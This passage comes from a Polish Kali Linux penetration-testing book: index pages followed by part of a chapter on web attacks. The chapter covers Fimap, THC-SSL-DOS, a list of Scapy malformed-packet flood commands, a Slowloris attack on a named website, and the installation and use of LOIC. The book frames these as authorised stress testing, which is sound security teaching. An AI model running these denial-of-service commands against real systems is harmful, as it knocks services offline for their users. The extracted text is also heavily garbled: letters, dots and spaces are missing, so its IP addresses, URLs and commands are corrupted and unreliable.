poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
